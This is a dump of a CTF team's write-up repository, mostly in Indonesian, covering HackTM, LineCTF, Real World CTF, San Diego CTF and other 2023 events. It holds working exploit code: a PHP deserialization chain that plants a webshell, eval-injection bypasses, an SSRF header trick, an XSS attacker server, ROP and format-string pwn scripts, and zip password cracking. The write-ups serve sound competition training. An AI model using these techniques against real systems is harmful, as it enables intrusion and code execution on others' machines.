[0xc2,0x9c,0x65,0x83,0x95,0x66,0xfa,0x15,0x5e,0x58,0x2f,0x23,0xac,0x4f,0xa1,0x4c,0x7d,0x1e,0x69,0x80,0x8c,0x4a,0x26,0x5b,0x5f,0x91,0x30,0xcf,0xc0,0x4d,0x97,0x9b,0xba,0x20,0x77,0x4c,0xf5,0xef,0x97,0x96,0x31,0x30,0x8c,0xe2] 21 | 22 | idx = [0x0e,0x03,0x1c,0x13,0x17,0x21,0x12,0x04,0x27,0x09,0x0d,0x22,0x1e,0x15,0x0b,0x24,0x1d,0x0a,0x18,0x2b,0x19,0x00,0x1b,0x2a,0x08,0x1f,0x20,0x25,0x02,0x1a,0x0c,0x29,0x07,0x05,0x11,0x28,0x14,0x16,0x23,0x0f,0x01,0x10,0x2c,0x06,0x26] 23 | 24 | print(len(array)) 25 | print(len(idx)) 26 | print(key_list) 27 | print(len(key_list)) 28 | 29 | for i in range(44): 30 | p = key_list[idx[i]] 31 | c = array[i] 32 | print(chr(p^c), end='') 33 | print() 34 | ``` 35 | 36 | ## Our Team Members Writeup 37 | 38 | - https://github.com/daffainfo/ctf-writeup/tree/main/BYUCTF%202023 39 | ``` 40 | Crypto Compact 41 | Crypto RSA1 42 | Crypto RSA2 43 | Crypto RSA3 44 | Crypto RSA4 45 | Crypto RSA5 46 | OSINT Legoclones 1 47 | OSINT Legoclones 2 48 | ``` -------------------------------------------------------------------------------- /2023/Cursedctf-2023/README.md: -------------------------------------------------------------------------------- 1 | ## Chall Archive: 2 | [https://drive.google.com/drive/folders/1MjkHTBFcUh94nb4SCxRDIDSNrB9P3kdv?usp=sharing](https://drive.google.com/drive/folders/1MjkHTBFcUh94nb4SCxRDIDSNrB9P3kdv?usp=sharing "https://drive.google.com/drive/folders/1MjkHTBFcUh94nb4SCxRDIDSNrB9P3kdv?usp=sharing") 3 | 4 | ## Ourteam Writeup 5 | @daffainfo 6 | 7 | [https://github.com/daffainfo/ctf-writeup/tree/main/cursedCTF%202023](https://github.com/daffainfo/ctf-writeup/tree/main/cursedCTF%202023 "https://github.com/daffainfo/ctf-writeup/tree/main/cursedCTF%202023") 8 | 9 | 10 | -------------------------------------------------------------------------------- /2023/DiceCTF-2023/Pasted image 20230207164229.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/DiceCTF-2023/Pasted image 20230207164229.png -------------------------------------------------------------------------------- /2023/DiceCTF-2023/Pasted image 20230207164413.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/DiceCTF-2023/Pasted image 20230207164413.png -------------------------------------------------------------------------------- /2023/DiceCTF-2023/Pasted image 20230207164435.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/DiceCTF-2023/Pasted image 20230207164435.png -------------------------------------------------------------------------------- /2023/HTB Cyber Apocalypse 2023/Pasted image 20230324115213.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/HTB Cyber Apocalypse 2023/Pasted image 20230324115213.png -------------------------------------------------------------------------------- /2023/HackTMCTF-quals/README.md: -------------------------------------------------------------------------------- 1 | # Crypto - d-phi-enc 2 | 3 | Franklin Reiter's attack on related messages. 4 | 5 | source: https://github.com/ashutosh1206/Crypton/blob/master/RSA-encryption/Attack-Franklin-Reiter/README.md 6 | 7 | Ketika 2 pesan berbeda dienkripsi dengan nilai e dan modulus N yang sama, akan tetapi pesan tersebut saling berkaitan, misalnya: 8 | 9 | ``` 10 | c1 = m^e % N 11 | c2 = (m+constant)^e % N 12 | ``` 13 | 14 | Pada soal ini diketahui masing-masing persamaan berikut 15 | 16 | ``` 17 | enc_d = ((1-k*phi)/e)^3 % N 18 | enc_phi = (phi)^3 % N 19 | ``` 20 | 21 | Berdasarkan uji coba yang saya lakukan ketika mencari nilai d dengan e=3, didapatkan nilai k yang relatif kecil yaitu antara 1 sampai 3, tapi kebanyakan yang saya temui adalah 2, oleh karena itu saya coba dengan nilai k=2, berikut script yang digunakan: 22 | 23 | from: https://github.com/ashutosh1206/Crypton/blob/master/RSA-encryption/Attack-Franklin-Reiter/exploit.sage 24 | 25 | ```python 26 | def GCD(a, b): 27 | while b: 28 | a,b = b, a % b 29 | a.monic() 30 | def franklinreiter(C1, C2, e, N): 31 | P. = PolynomialRing(Zmod(N)) 32 | f1 = ((1+2*phi)//e)^e - C1 33 | f2 = phi^e - C2 34 | return -GCD(f1, f2).coefficients()[0] 35 | phi = franklinreiter(enc_d, enc_phi, 3, n) 36 | d = pow(3, -1, phi) 37 | flag = hex(pow(enc_flag, d, N))[2:] 38 | print(bytes.fromhex(flag)) #b"HackTM{Have you warmed up? If not, I suggest you consider the case where e=65537, although I don't know if it's solvable. Why did I say that? Because I have to make this flag much longer to avoid solving it just by calculating the cubic root of enc_flag.}" 39 | ``` 40 | 41 | Write up crypto dari probset [https://github.com/y011d4/my-ctf-challenges/tree/main/2023-HackTMCTF-2023/crypto](https://github.com/y011d4/my-ctf-challenges/tree/main/2023-HackTMCTF-2023/crypto "https://github.com/y011d4/my-ctf-challenges/tree/main/2023-HackTMCTF-2023/crypto") 42 | 43 | # WEB - Blog revenge 44 | 45 | Blog revenge solver 46 | 47 | ```php 48 | queries = array( 93 | new Query("ATTACH DATABASE '/var/www/html/images/$webshell' AS jctf;", array()), 94 | new Query("CREATE TABLE jctf.pwn (dataz text);", array()), 95 | new Query('INSERT INTO jctf.pwn (dataz) VALUES ("= system($_GET[0]); ?>");', array()) 96 | ); 97 | 98 | $username = "a"; 99 | $myobj = new User($username); 100 | $myobj->profile = new Query("", ""); 101 | $myobj->profile->query_string = new User(""); 102 | $myobj->profile->query_string->profile = $conn; 103 | 104 | 105 | $payload = base64_encode(serialize($myobj)); 106 | register($username); 107 | 108 | $response = request($payload); 109 | // echo $response; 110 | 111 | shell($webshell); 112 | ``` 113 | 114 | 115 | ## External writeup 116 | 117 | [https://github.com/daffainfo/ctf-writeup/tree/main/HackTM%202023](https://github.com/daffainfo/ctf-writeup/tree/main/HackTM%202023 "https://github.com/daffainfo/ctf-writeup/tree/main/HackTM%202023") 118 | 119 | - web/Blog 120 | 121 | By: daffainfo 122 | -------------------------------------------------------------------------------- /2023/IdekCTF-2022/Pasted image 20230116231049.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/IdekCTF-2022/Pasted image 20230116231049.png -------------------------------------------------------------------------------- /2023/IdekCTF-2022/Pasted image 20230116231114.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/IdekCTF-2022/Pasted image 20230116231114.png -------------------------------------------------------------------------------- /2023/IdekCTF-2022/Pasted image 20230116231338.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/IdekCTF-2022/Pasted image 20230116231338.png -------------------------------------------------------------------------------- /2023/Knightctf-2023/Pasted image 20230122064030.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064030.png -------------------------------------------------------------------------------- /2023/Knightctf-2023/Pasted image 20230122064152.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064152.png -------------------------------------------------------------------------------- /2023/Knightctf-2023/Pasted image 20230122064305.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064305.png -------------------------------------------------------------------------------- /2023/Knightctf-2023/Pasted image 20230122064318.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064318.png -------------------------------------------------------------------------------- /2023/Knightctf-2023/Pasted image 20230122064420.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064420.png -------------------------------------------------------------------------------- /2023/Knightctf-2023/Pasted image 20230122064435.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064435.png -------------------------------------------------------------------------------- /2023/Knightctf-2023/Pasted image 20230122064452.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064452.png -------------------------------------------------------------------------------- /2023/Knightctf-2023/Pasted image 20230122064534.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064534.png -------------------------------------------------------------------------------- /2023/Knightctf-2023/Pasted image 20230122064618.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064618.png -------------------------------------------------------------------------------- /2023/Knightctf-2023/Pasted image 20230122064721.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064721.png -------------------------------------------------------------------------------- /2023/Knightctf-2023/Pasted image 20230122064755.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064755.png -------------------------------------------------------------------------------- /2023/Knightctf-2023/Pasted image 20230122064820.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064820.png -------------------------------------------------------------------------------- /2023/Knightctf-2023/Pasted image 20230122064919.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064919.png -------------------------------------------------------------------------------- /2023/LACTF-2023/Pasted image 20230214115929.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/LACTF-2023/Pasted image 20230214115929.png -------------------------------------------------------------------------------- /2023/LineCTF 2023/README.md: -------------------------------------------------------------------------------- 1 | # Old Pal - web 2 | ## Description 3 | How about an Old Pal for your aperitif? 4 | http://104.198.120.186:11006/cgi-bin/main.pl?password= 5 | 6 | ## Exploit 7 | Pada challenge ini kita diberikan source code sebagai berikut. 8 | 9 | ```perl 10 | #!/usr/bin/perl 11 | use strict; 12 | use warnings; 13 | 14 | use CGI; 15 | use URI::Escape; 16 | 17 | 18 | $SIG{__WARN__} = \&warn; 19 | sub warn { 20 | print("Hacker? :("); 21 | exit(1); 22 | } 23 | 24 | 25 | my $q = CGI->new; 26 | print "Content-Type: text/html\n\n"; 27 | 28 | 29 | my $pw = uri_unescape(scalar $q->param("password")); 30 | if ($pw eq '') { 31 | print "Hello :)"; 32 | exit(); 33 | } 34 | if (length($pw) >= 20) { 35 | print "Too long :("; 36 | die(); 37 | } 38 | if ($pw =~ /[^0-9a-zA-Z_-]/) { 39 | print "Illegal character :("; 40 | die(); 41 | } 42 | if ($pw !~ /[0-9]/ || $pw !~ /[a-zA-Z]/ || $pw !~ /[_-]/) { 43 | print "Weak password :("; 44 | die(); 45 | } 46 | if ($pw =~ /[0-9_-][boxe]/i) { 47 | print "Do not punch me :("; 48 | die(); 49 | } 50 | if ($pw =~ /AUTOLOAD|BEGIN|CHECK|DESTROY|END|INIT|UNITCHECK|abs|accept|alarm|atan2|bind|binmode|bless|break|caller|chdir|chmod|chomp|chop|chown|chr|chroot|close|closedir|connect|cos|crypt|dbmclose|dbmopen|defined|delete|die|dump|each|endgrent|endhostent|endnetent|endprotoent|endpwent|endservent|eof|eval|exec|exists|exit|fcntl|fileno|flock|fork|format|formline|getc|getgrent|getgrgid|getgrnam|gethostbyaddr|gethostbyname|gethostent|getlogin|getnetbyaddr|getnetbyname|getnetent|getpeername|getpgrp|getppid|getpriority|getprotobyname|getprotobynumber|getprotoent|getpwent|getpwnam|getpwuid|getservbyname|getservbyport|getservent|getsockname|getsockopt|glob|gmtime|goto|grep|hex|index|int|ioctl|join|keys|kill|last|lc|lcfirst|length|link|listen|local|localtime|log|lstat|map|mkdir|msgctl|msgget|msgrcv|msgsnd|my|next|not|oct|open|opendir|ord|our|pack|pipe|pop|pos|print|printf|prototype|push|quotemeta|rand|read|readdir|readline|readlink|readpipe|recv|redo|ref|rename|require|reset|return|reverse|rewinddir|rindex|rmdir|say|scalar|seek|seekdir|select|semctl|semget|semop|send|setgrent|sethostent|setnetent|setpgrp|setpriority|setprotoent|setpwent|setservent|setsockopt|shift|shmctl|shmget|shmread|shmwrite|shutdown|sin|sleep|socket|socketpair|sort|splice|split|sprintf|sqrt|srand|stat|state|study|substr|symlink|syscall|sysopen|sysread|sysseek|system|syswrite|tell|telldir|tie|tied|time|times|truncate|uc|ucfirst|umask|undef|unlink|unpack|unshift|untie|use|utime|values|vec|wait|waitpid|wantarray|warn|write/) { 51 | print "I know eval injection :("; 52 | die(); 53 | } 54 | if ($pw =~ /[Mx. squ1ffy]/i) { 55 | print "You may have had one too many Old Pal :("; 56 | die(); 57 | } 58 | 59 | 60 | if (eval("$pw == 20230325")) { 61 | print "Congrats! Flag is LINECTF{redacted}" 62 | } else { 63 | print "wrong password :("; 64 | die(); 65 | }; 66 | ``` 67 | 68 | Untuk membypass semua itu kita bisa menggunakan payload berikut. 69 | 70 | ``` 71 | 20230325-v48 72 | ``` 73 | 74 | Dimana v48 equal denga '0' sehinggal nanti menghasilkan `20230325` yang merupakan password yang harus kita inputkan. 75 | 76 | # Imagexif - web 77 | ## Description 78 | This site provides you with the information of the image(EXIF) file. But there is a dangerous vulnerability here. I hope you get the data you want with the various functions of the system and your imagination. 79 | 80 | ## exploit 81 | Pada challenge ini kita akan meng-eksploitasi [CVE-2021-22204](https://github.com/bilkoh/POC-CVE-2021-22204/blob/main/build_image.pl). 82 | 83 | Saat kita melihat dockerfile pada backend kita akan menemukan bahwa mesin tersebut menggunakan versi exiftool yang vulnerable. 84 | 85 | ```dockerfile 86 | RUN wget https://github.com/exiftool/exiftool/archive/refs/tags/12.22.tar.gz && \ 87 | tar xvf 12.22.tar.gz && \ 88 | cp -fr /exiftool-12.22/* /usr/bin && \ 89 | rm -rf /exiftool-12.22 && \ 90 | rm 12.22.tar.gz 91 | ``` 92 | 93 | Kita akan menggunakan POC berikut untuk mendapatkan flagnya https://github.com/bilkoh/POC-CVE-2021-22204/blob/main/build_image.pl. 94 | 95 |  96 | 97 | Jalankan perintah diatas dan nanti akan muncul image `notevil.jpg`, kita kirim image tersebut ke server dan kita akan mendapatkan flagnya. 98 | 99 |  100 | 101 | # Adult Simple GoCurl - web 102 | Pada challenge ini kita perlu membuat request ke `/flag`, disini kita bisa memanfaatkan fitur pada module gin golang yaitu `X-Forwarded-Prefix` untuk lebih jelasnya bisa dilihat disini https://github.com/gin-gonic/gin/pull/1238/commits/0906ea946d9f39dc5b8e9b4832d1eb9eaa8ca35f. 103 | 104 | Fitur ini berfungsi untuk mengubah redirect dari golang dengan mendambahkan value yang kita berikan tadi ke header `Location`. 105 | 106 | Berikut request yang saya gunakan untuk menyelesaikan challenge ini. 107 | 108 | ```http 109 | GET /curl/?url=http://127.0.0.1:8080//&header_key=X-Forwarded-Prefix&header_value=/flag HTTP/1.1 110 | Host: 34.84.87.77:11001 111 | Connection: close 112 | ``` 113 | 114 |  115 | 116 | # Our Team Writeup 117 | @daffainfo 118 | 119 | https://github.com/daffainfo/ctf-writeup/tree/main/LINE%20CTF%202023 120 | | Category | Challenge | 121 | | --- | --- | 122 | | Web | Baby Simple GoCurl 123 | 124 | @kaelanalysis 125 | 126 | - https://github.com/maulvialf/CTF-Writeups/tree/main/2023/linectf 127 | - https://maulvialf.medium.com/write-up-reverse-engingeering-line-ctf-2023-fishing-and-jumpit-18d5a6c3092e 128 | 129 | - rev 130 | 1. fishing 131 | 2. jumpit -------------------------------------------------------------------------------- /2023/Real-World-CTF/Pasted image 20230109172555.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Real-World-CTF/Pasted image 20230109172555.png -------------------------------------------------------------------------------- /2023/Real-World-CTF/README.md: -------------------------------------------------------------------------------- 1 | # web 2 | --- 3 | ## ChatUwU 4 | Kita diberikan attachment yang berupa aplikasi yang menggunakan nodejs dengan dependency express dan juga socket io. 5 | 6 | Langsung masuk ke intinya. 7 | Vulnerability pada web app tersebut berada di client side pada kode berikut 8 | `index.html` 9 | ```js 10 | document.title += ' - ' + room; 11 | let socket = io(`/${location.search}`), # <- vulnerable code 12 | messages = document.getElementById('messages'), 13 | form = document.getElementById('form'), 14 | input = document.getElementById('input'); 15 | ``` 16 | 17 | socket io mengambil parameter location.search sebagai inputnya. Kita bisa memanipulasi location.search dengan menambahkan foo@attacker.com di salah satu parameter url misalnya 18 | http://localhost:58000/?nickname=x@localhost:8000/?nickname=x&room=DOMPurify 19 | 20 | Dengan cara ini kita dapat mengubah poin akses socket io ke web socket yang kita buat sendiri sehingga kita dapat mengirimkan malcious data yang berisi payload untuk mendapatkan xss di client. 21 | 22 | Berikut code yang saya gunakan untuk membuat attacker server: 23 | 24 | ```js 25 | const http = require("http").Server(); 26 | const { Server } = require("socket.io"); 27 | 28 | const io = new Server(http, { 29 | cors: { 30 | origin: "http://localhost:58000", 31 | }, 32 | }); 33 | 34 | const hostname = "0.0.0.0"; 35 | const port = 8000; 36 | 37 | let payload = btoa(` 38 | // xss payload here 39 | alert(1) 40 | `) 41 | payload = ` 42 | 43 | `; 44 | 45 | io.on("connection", (socket) => { 46 | let { room } = socket.handshake.query; 47 | console.log(socket.handshake.query); 48 | 49 | socket.join(room); 50 | io.to(room).emit("msg", { 51 | from: "attacker", 52 | text: payload, 53 | isHtml: true, 54 | }); 55 | }); 56 | 57 | http.listen(port, hostname, () => { 58 | console.log(`ChatUWU server running at http://${hostname}:${port}/`); 59 | }); 60 | ``` 61 | 62 |  -------------------------------------------------------------------------------- /2023/San-diego-ctf-2023/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | Archive: "https://drive.google.com/drive/folders/1xx240hie7UY9wiJSIHbDgwPoQdgIq3Uq?usp=sharing" 3 | --- 4 | 5 | # tROPic-thunder - PWN 6 | 7 | ```python 8 | #!/usr/bin/env python3 9 | # -*- coding: utf-8 -*- 10 | # This exploit template was generated via: 11 | # $ pwn template --host thunder.sdc.tf --port 1337 ./tROPic-thunder 12 | from pwn import * 13 | 14 | # Set up pwntools for the correct architecture 15 | exe = context.binary = ELF('./tROPic-thunder') 16 | 17 | # Many built-in settings can be controlled on the command-line and show up 18 | # in "args". For example, to dump all data sent/received, and disable ASLR 19 | # for all created processes... 20 | # ./exploit.py DEBUG NOASLR 21 | # ./exploit.py GDB HOST=example.com PORT=4141 22 | host = args.HOST or 'thunder.sdc.tf' 23 | port = int(args.PORT or 1337) 24 | 25 | def start_local(argv=[], *a, **kw): 26 | '''Execute the target binary locally''' 27 | if args.GDB: 28 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 29 | else: 30 | return process([exe.path] + argv, *a, **kw) 31 | 32 | def start_remote(argv=[], *a, **kw): 33 | '''Connect to the process on the remote host''' 34 | io = connect(host, port) 35 | if args.GDB: 36 | gdb.attach(io, gdbscript=gdbscript) 37 | return io 38 | 39 | def start(argv=[], *a, **kw): 40 | '''Start the exploit against the target.''' 41 | if args.LOCAL: 42 | return start_local(argv, *a, **kw) 43 | else: 44 | return start_remote(argv, *a, **kw) 45 | 46 | # Specify your GDB script here for debugging 47 | # GDB will be launched if the exploit is run via e.g. 48 | # ./exploit.py GDB 49 | gdbscript = ''' 50 | tbreak main 51 | continue 52 | '''.format(**locals()) 53 | 54 | #=========================================================== 55 | # EXPLOIT GOES HERE 56 | #=========================================================== 57 | # Arch: amd64-64-little 58 | # RELRO: Partial RELRO 59 | # Stack: Canary found 60 | # NX: NX enabled 61 | # PIE: No PIE (0x400000) 62 | 63 | io = start() 64 | 65 | bss = exe.bss()+0x200 66 | rop = ROP(exe) 67 | 68 | p = 'a'*(112+8) 69 | 70 | rop.read(0,bss,0x40) 71 | rop.open(bss,0,0) 72 | rop.read(3,bss+0x100,0x100) 73 | rop.write(1,bss+0x100,0x100) 74 | p += rop.chain() 75 | print(rop.dump()) 76 | 77 | io.sendlineafter("one!\n",p) 78 | 79 | io.send("./flag.txt") 80 | 81 | io.interactive() 82 | ``` 83 | 84 | # money-printer - PWN 85 | 86 | ```python 87 | #!user/bin/python3 88 | from pwn import * 89 | 90 | # ========================================================= 91 | # SETUP 92 | # ========================================================= 93 | exe = './money-printer' 94 | elf = context.binary = ELF(exe, checksec=True) 95 | context.log_level = 'warn' 96 | 97 | # ========================================================= 98 | # EXPLOITS 99 | # ========================================================= 100 | 101 | flag = "" 102 | 103 | for i in range(10, 16): 104 | try: 105 | # io = process(exe) 106 | io = remote('money.sdc.tf', 1337) 107 | # overwriting dollar variable 108 | io.sendlineafter(b'how many of them do you want?', b'-1') 109 | # format string vuln 110 | io.sendlineafter(b'to the audience?', f'%{i}$p'.encode()) 111 | io.recvuntil(b'\n') 112 | leak = io.recvline() 113 | if not b'nil' in leak: 114 | print(f'stack at {i} :' + str(leak)) 115 | try: 116 | hexform = unhex(leak.split()[3][2:].decode()) 117 | flag += hexform.decode()[::-1] 118 | print('flag appended') 119 | except BaseException: 120 | pass 121 | io.close() 122 | except EOFError or UnicodeDecodeError: 123 | pass 124 | 125 | print(f'{flag=}') 126 | ``` 127 | 128 | # money printer2 - pwn 129 | 130 | ```python 131 | def exploit(): 132 | io = start() 133 | 134 | # Step 1 135 | p ='-2147483647' 136 | io.sendline(p) 137 | 138 | p = '%p%c'+'%c'*(25-4) + '%{}c%hn'.format(0xdec8-0x24) 139 | p += '%{}c%51$hn'.format((0x10000 - 0xdec8) + 0x07e8) # dec8 d948 140 | io.sendlineafter('ence?\n',p) 141 | 142 | io.recvuntil('said: ') 143 | stack = int(io.recv(14),16) 144 | stack_canary = stack + 0x2698 145 | # print "Leak stack canary : " + str(hex(stack_canary)) 146 | print "Leak return stack : " + str(hex(stack_canary)) 147 | 148 | # Step 2 149 | p ='-2147483647' 150 | io.sendline(p) 151 | 152 | # 0x00000000004007e7 <+0>: push rbp 153 | # 0x00000000004007e8 <+1>: mov rbp,rsp 154 | 155 | writes = {0x601020 : 0x4007e7, # GOT _stack_chk_fail -> main 0x00000000004007e8 156 | stack_canary : 0x0f} 157 | p = fmtstr_payload(8, writes, numbwritten=0) 158 | print(len(p)) 159 | io.sendlineafter('ence?\n',p) 160 | print('pass step 2') 161 | 162 | # Step 3 163 | p ='-2147483647' 164 | io.sendline(p) 165 | 166 | writes = { 167 | exe.got['printf'] : exe.plt['system'], # GOT printf -> main system 168 | stack_canary-0x80-0x10 : 0x0f 169 | } 170 | p = fmtstr_payload(8, writes, numbwritten=0) 171 | io.sendlineafter('ence?\n',p) 172 | print('pass step 3') 173 | 174 | # Step 4 175 | p ='-2147483647' 176 | io.sendline(p) 177 | p ='cat flag*' 178 | io.sendline(p) 179 | 180 | io.interactive() 181 | 182 | # exploit() 183 | for i in range(1000): 184 | try: 185 | exploit() 186 | except Exception as e: 187 | pass 188 | ``` -------------------------------------------------------------------------------- /2023/VU-Cyberthon-2023/README.md: -------------------------------------------------------------------------------- 1 | ## Weak Password 2 | Pada challenge ini kita diberikan zip yang ter lock. Untuk unlocknya kita perlu menggunakan john the ripper. 3 | 4 | Pertama kita rubah dari zip ke format john 5 | ```sh 6 | zip2john taskweakpassword.zip > hash.txt 7 | ``` 8 | 9 | Setelah itu kita crack menggunakan wordlist seclist 10 | ```sh 11 | john -w=/usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000000.txt hash.txt 12 | ``` 13 | 14 | Bisa kita cek hasilnya menggunakan 15 | ```sh 16 | john --show hash.txt 17 | ``` 18 | 19 | output 20 | ``` 21 | taskweakpassword.zip/taskweakpassword/about.txt:Kaunas:taskweakpassword/about.txt:taskweakpassword.zip::taskweakpassword.zip 22 | 23 | 1 password hash cracked, 0 left 24 | ``` 25 | Setelah itu kita perlu meng-wrap password itu denga VU{.*} 26 | Flag: VU{Kaunas} 27 | 28 | ## Eksternal writeup from our team 29 | ### Daffainfo 30 | https://github.com/daffainfo/ctf-writeup/tree/main/VU%20CYBERTHON%202023 31 | 32 | | Category | Challenge 33 | | --- | --- | 34 | | Cryptography, Web Exploitation | [Simple Web](/VU%20CYBERTHON%202023/Simple%20Web/) 35 | | Cryptography, Web Exploitation | [Docker Web](/VU%20CYBERTHON%202023/Docker%20Web/) 36 | | Network Security | [Blue Baby Shark](/VU%20CYBERTHON%202023/Blue%20Baby%20Shark/) 37 | | OSINT | [RFC standard for security policy information](/VU%20CYBERTHON%202023/RFC%20standard%20for%20security%20policy%20information/) 38 | | OSINT | [Find location](/VU%20CYBERTHON%202023/Find%20location/) 39 | | Digital Forensics | [What is SHA1 checksum of image file blk0_mmcblk0.bin ?](/VU%20CYBERTHON%202023/What%20is%20SHA1%20checksum%20of%20image%20file%20blk0_mmcblk0.bin/) 40 | | Digital Forensics | [What is the name of the largest partition?](/VU%20CYBERTHON%202023/What%20is%20the%20name%20of%20the%20largest%20partition/) 41 | | Digital Forensics | [What email address is setup on com.android.email service?](/VU%20CYBERTHON%202023/What%20email%20address%20is%20setup%20on%20com.android.email%20service/) 42 | | Digital Forensics | [What is the brand (vendor) of phone?](/VU%20CYBERTHON%202023/What%20is%20the%20brand%20(vendor)%20of%20phone/) 43 | | Digital Forensics | [Find ICCID Number](/VU%20CYBERTHON%202023/Find%20ICCID%20Number/) 44 | | Digital Forensics | [Find MSISDN Number](/VU%20CYBERTHON%202023/Find%20MSISDN%20Number/) 45 | | Digital Forensics | [What is the name of the username telegram?](/VU%20CYBERTHON%202023/What%20is%20the%20name%20of%20the%20username%20telegram/) 46 | | Digital Forensics | [What is the model of the phone?](/VU%20CYBERTHON%202023/What%20is%20the%20model%20of%20the%20phone/) 47 | | Digital Forensics | [What is the name of WhatsApp user which has phone number +37062166565?](/VU%20CYBERTHON%202023/What%20is%20the%20name%20of%20WhatsApp%20user%20which%20has%20phone%20number%20%2B37062166565/) 48 | | Digital Forensics | [How much dollars the seized weapons (stuff) may have cost?](/VU%20CYBERTHON%202023/How%20much%20dollars%20the%20seized%20weapons%20(stuff)%20may%20have%20cost/) 49 | | Digital Forensics | [What tank specs the user was looking for?](/VU%20CYBERTHON%202023/What%20tank%20specs%20the%20user%20was%20looking%20for/) 50 | | Digital Forensics | [What web address was provided for a company that can rent cargo planes?](/VU%20CYBERTHON%202023/What%20web%20address%20was%20provided%20for%20a%20company%20that%20can%20rent%20cargo%20planes/) 51 | | Digital Forensics | [What is a name of video file which is related with tanks?](/VU%20CYBERTHON%202023/What%20is%20a%20name%20of%20video%20file%20which%20is%20related%20with%20tanks/) 52 | | Digital Forensics | [Based on the analysis of the video file 20221015_173902.mp4, please provide the GPS coordinates of the possible place, where video was recorded?](/VU%20CYBERTHON%202023/Based%20on%20the%20analysis%20of%20the%20video%20file%2020221015_173902.mp4%2C%20please%20provide%20the%20GPS%20coordinates%20of%20the%20possible%20place%2C%20where%20video%20was%20recorded/) 53 | | Digital Forensics | [Based on the review of the media files, please provide the GPS coordinates of the possible meeting point.](/VU%20CYBERTHON%202023/Based%20on%20the%20review%20of%20the%20media%20files%2C%20please%20provide%20the%20GPS%20coordinates%20of%20the%20possible%20meeting%20point/) 54 | 55 | -------------------------------------------------------------------------------- /2023/WaniCtf 2023/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | Chall Archive: "https://drive.google.com/drive/folders/1pLS49uUfsT05XXTK7ZJRkHqWEhF2lW-_?usp=sharing" 3 | --- 4 | 5 |  6 | 7 | Our Team Writeup 8 | === 9 | 10 | ## dimas maulana 11 | 12 | WaniCTF 2023 Writeup. 13 | 14 | Web Challenges: 15 | - screenshot 16 | - certified 2 17 | - Lambda 18 | 19 | Misc Challenges: 20 | - machine_loading 21 | 22 | [https://hackmd.io/@Solderet/SomeWriteupForWaniCTF2023-XogSiA](https://hackmd.io/@Solderet/SomeWriteupForWaniCTF2023-XogSiA 